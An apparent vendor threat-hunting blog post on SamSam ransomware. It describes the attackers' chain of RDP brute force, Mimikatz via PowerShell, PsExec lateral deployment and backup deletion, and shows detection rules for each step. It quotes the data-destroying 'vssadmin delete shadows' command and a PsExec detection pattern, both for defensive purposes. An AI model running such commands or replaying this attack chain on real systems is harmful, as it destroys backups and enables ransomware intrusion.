As we work with our customers to protect their organizations against the latest variants of SamSam ransomware, we’ve learned more about how it operates. We’re sharing those findings here, along with guidance on how our Threat Response module enables threat hunters to quickly detect and respond to this threat.
(Image: Pete Linforth / Pixabay)
Many organizations have fallen victim to SamSam, a ransomware variant which has been a hot topic for the past several months. Known for bringing networks to a halt, this opportunistic attack has been observed across several industry verticals including Healthcare, Government and Retail.
SamSam is not a new threat, having been observed in the wild for more than two years. After infecting networks, the hackers are extorting victims for bitcoin in exchange for decryption keys. The TTPs for detecting this variant are not complex, but many organizations fall victim because they’ve inadequately secured their perimeter, providing an initial entry-point for a broader infection.
At Tanium, we’re helping our customers protect against and respond to recent SamSam outbreaks using our Threat Response module, which provides the ability to detect malicious activity linked to SamSam, take action against threats and address the root cause vulnerabilities that lead to infection. We’ll detail how it all works, but first we want to share what we’ve learned so far about this particular strain of ransomware.
SamSam modus operandi
The SamSam threat actors were first observed exploiting a remote code execution vulnerability in unpatched versions of Java JBOSS application server. However, over the last 18 months, the threat actors behind SamSam have taken advantage of a wider range of vulnerabilities to gain initial access to a victim organization. One prevalent technique focuses on hosts that expose Remote Desktop and RDP application gateways to the internet. Simple RDP brute force tools are utilized by the threat actors to find commonly used or default passwords.
After the threat actors establish a foothold within a network segment, they can enumerate hosts and users on the network via native Windows commands such as NET.EXE. The attackers utilize malicious PowerShell scripts to load the Mimikatz credential harvesting utility, allowing them to obtain access to privileged accounts. By moving laterally and dumping additional credentials, attackers can eventually obtain Active Directory domain administrator or highly privileged service accounts.
Given these credentials, attackers can infect domain controllers, destroy backups and proceed to automatically target and encrypt a broader set of endpoints. The threat actors deploy and run the malware using a batch script and WMI or PsExec utilities.
Figure 1: Copy of a SamSam batch script which launches the malicious binary and sets variables.
Newer variants of SamSam can be observed referencing a “runner” file with a “.stubbin” file extension. This method loads the malware via a .NET binary which decrypts and runs the malicious binary. Once the encryption routine begins, files are encrypted and renamed with a new file extension, and a separate .html file is dropped, which acts as the ransom note. The ransom demands payment via Bitcoin and also offers free decryption of two files (not hosts) to prove they have the proper keys.
SamSam ransomware: How Tanium Threat Response can help
Threat Response includes a powerful detection capability known as “Signals,” which provides continuous monitoring and real-time alerting for malicious activity. The Tanium EDR team maintains a feed of Signals which have been written and aligned to the MITRE ATT&CK Framework in order to provide customers with high-fidelity identification of common attacker methodologies. In this section, we’ll cover how some of the out-of-the-box Signals would automatically identify components of a SamSam attack, as well as how customers can create their own custom signals.
The SamSam threat actors often utilize Mimikatz to escalate their access to an elevated user or domain administrator. The threat actors use this command (or similar variants) to download and run a PowerShell based version of Mimikatz:
Figure 2: The following command has been observed by the threat actors to download and run Mimikatz via PowerShell.
The “Suspicious PowerShell Command Line” Signal identifies this PowerShell execution based on the activities it performs. Upon execution of the PowerShell command, the Signals alert will reach the Tanium console within seconds, even If the system is not on the corporate network.
Figure 3: Example of a Tanium Signal Alert for Suspicious PowerShell Command Line.
Irrespective of the command-line used, Tanium can also detect and alert upon PowerShell executed through an atypical process ancestry, which often occurs when a payload is delivered via macro malware or other exploited applications.
If an attacker opts to directly run the standalone Mimikatz executable, instead of reflectively loading it through PowerShell, Tanium’s signal feed also provides several detection mechanisms. The screenshot below shows an example of such an alert:
Figure 4: Example of Tanium Signal Alert for Mimikatz execution.
Another common tactic used by the SamSam threat actors is to ensure backup files are deleted. This makes restoration efforts significantly more difficult, which increases the likelihood their victim will pay the ransom. One method commonly used is to delete Windows Volume Shadow Copies. Tanium Threat Response will detect and alert upon this activity upon execution.
Figure 5: Pivoting to investigate a Tanium Signal Alert for Volume Shadow Copy Deletion.
By pivoting on the activity executed around an alert, it is possible to not only see the “vssadmin delete shadows” command, but also other actions taken at the command prompt. Tanium’s ability to visualize endpoint activity can assist in reconstructing what preceded a compromise, as well as the subsequent impact of the event.
Detecting PsExec activity
Tanium Threat Response users can create their own Signals, containing any combination of file, network, process and registry events, for real-time detection and alerting. Furthermore, Signals can be tailored and applied to specific computer groups – rather than enterprise-wide – to allow security teams to apply different levels and types of monitoring to different types of systems.
The following examples demonstrate simple Signals to detect SamSam’s usage of the Sysinternals PsExec utility, along with the use of Tanium’s enterprise hunting and search capabilities to find related anomalies. Since PsExec is often legitimately used by system administrators, these Signals may need to be customized to accommodate for false positives. In the midst of an incident, an organization might opt to accept some “noise” in the interest of rapid detection and response.
The SamSam threat actors commonly use PSEXEC to laterally deploy and execute a batch script which, in turn, installs the malware. The command line and file naming conventions can vary from campaign to campaign. Here’s an example of a simple Signal to detect one of the variations:
Figure 6: Example Tanium Signal alert for PSEXEC Launching BAT file.
On the receiving system, the PsExec service binary PSEXESVC.EXE will launch an instance of CMD.EXE to run the copied batch script. We can detect the resulting activity with the following Signal:
process.parent_command_line ends with ‘psexesvc.exe’ AND process.command_line contains ‘cmd.exe /c’ and process.command_line contains ‘.bat’
Since Signals allow any combination of process.path, process.command_line, process.parent_path and process.parent_command_line, it’s easy to build additional detections for other variants (as well as to exclude legitimate activity). Of course, we’re just using basic process matching in these examples – users can include file, network and registry operations into the signal as well.
An investigator might also want to hunt for other variations of the attack that misuse PsExec. The “Trace Executed Process Trees” sensor makes it easy to compare the frequency of occurrence (count) of unique sequences of processes that launched with the PsExec service binary (PSEXESVC.EXE) as their parent. This can help pinpoint other outliers for drill-down and further analysis.
Figure 7: Comparing process trees launched by the PsExec service across hosts.
Investigators can also use Tanium to search the native Windows System Event log for Service Installation events related to PsExec, as shown below. This provides a complementary source of evidence, as well as the ability to find evidence on hosts that may not have had Tanium deployed prior to an incident.
Figure 8: Tanium Threat Response search for PsExec service creation.
Hunting the initial means of entry: remote desktop
As mentioned earlier, recent SamSam campaigns target organizations with endpoints that expose Remote Desktop Protocol (RDP) to the internet. Automated brute-force attacks against common administrator usernames can provide initial access to these systems. Once successful, the RDP hosts can be used as a foothold to target the rest of the environment. Even if a victim manages to detect or prevent subsequent stages of the attack, failure to identify and resolve these vulnerable entry-points will leave the network susceptible to re-compromise.
Tanium can help an organization quickly identify where Remote Desktop is exposed in a network and how it’s being used. For example, users can query for all systems that are currently listening on port 3389, as well as those with record of historical network connections to and from this port. Results can be enriched and grouped with additional data points, such as network range, hostname, OS, firewall information and other relevant attributes.
Figure 9: Identifying endpoints that are actively listening on port 3389 by hostname, IP and OS.
Figure 10: Searching for historical network connections to port 3389.
Tanium Threat Response also provides the ability to search native sources, such as operating system and application event logs, for additional evidence. For example, “Remote Desktop Event Log Search” sensor allows searching of historic RDP logon successes found within the Windows Event Log, specifically, those recorded in the Windows Terminal Services Operational Log.
Figure 11: Screenshot outlining the RDP Event log search sensor.
Going beyond Detection and Response
As a platform, Tanium’s broad set of security and IT operations capabilities can help organizations go beyond the traditional limits of EDR/EPP point solutions when responding to attacks. We’ll highlight two examples that relate back to the SamSam examples covered in this post.
Tanium Discover utilizes the Tanium architecture to efficiently identify unmanaged hosts – including those that might have services like Remote Desktop exposed to the internet or untrusted networks. Discover employs multiple means of fingerprinting endpoints with both passive and active techniques. Users can review the OS and open ports on unmanaged endpoints, create notification and alerting workflows and even block untrusted devices.
Figure 12: Reviewing managed and unmanaged devices with open RDP ports in Tanium Discover.
Figure 13: Reviewing details for an unmanaged device interface in Tanium Discover.
When it’s time to remediate, Tanium Protect can enforce Application Control policies to limit the execution of untrusted software, as well as endpoint firewall policies to limit unwanted network traffic. For example, on many sets of systems there may be no legitimate need for “powershell.exe” to initiate communications to external IP addresses on ports 80 or 443. This can hinder one of the commonly utilized techniques to execute scripts hosted on remote sites.
Figure 14: Reviewing an endpoint firewall policy in Protect.
Administrators can apply Protect policies to the same dynamic Tanium computer groups that can be defined and used throughout the platform. This makes it easier to test and deploy security controls in a staged manner, starting with endpoints that have the most consistent and stable configuration (such as domain controllers).
The tactics leveraged by the SamSam threat actors are not advanced or revolutionary, however they highlight common deficiencies in perimeter defense and privileged account management. Having enterprise-wide visibility into these activities can speed up the threat hunting process. By validating these security controls, it is possible to proactively defend against this threat, or retrace the activities of an intruder.
About the Author: Aaron Goldstein is a Director with Tanium’s Endpoint Detection and Response (EDR) Team. He joined Tanium after nine years of Incident Response consulting and threat intelligence management. During his career, Aaron has lead more than 250 security engagements spanning nine countries, ranging from high profile investigations and incident response to creating and customizing full-scale cyber intrusion training exercises. Aaron leverages his unique Incident Response experience in complex, large-scale breaches to provide strategic solutions to secure environments of all sizes. He is highly skilled in translating difficult topics into easy to understand training sessions and utilizes his knowledge and skills to bring a unique approach to the ever-growing challenge of securing critical systems. When he is not fixated on securing the world, Aaron enjoys traveling to remote locations and hiking.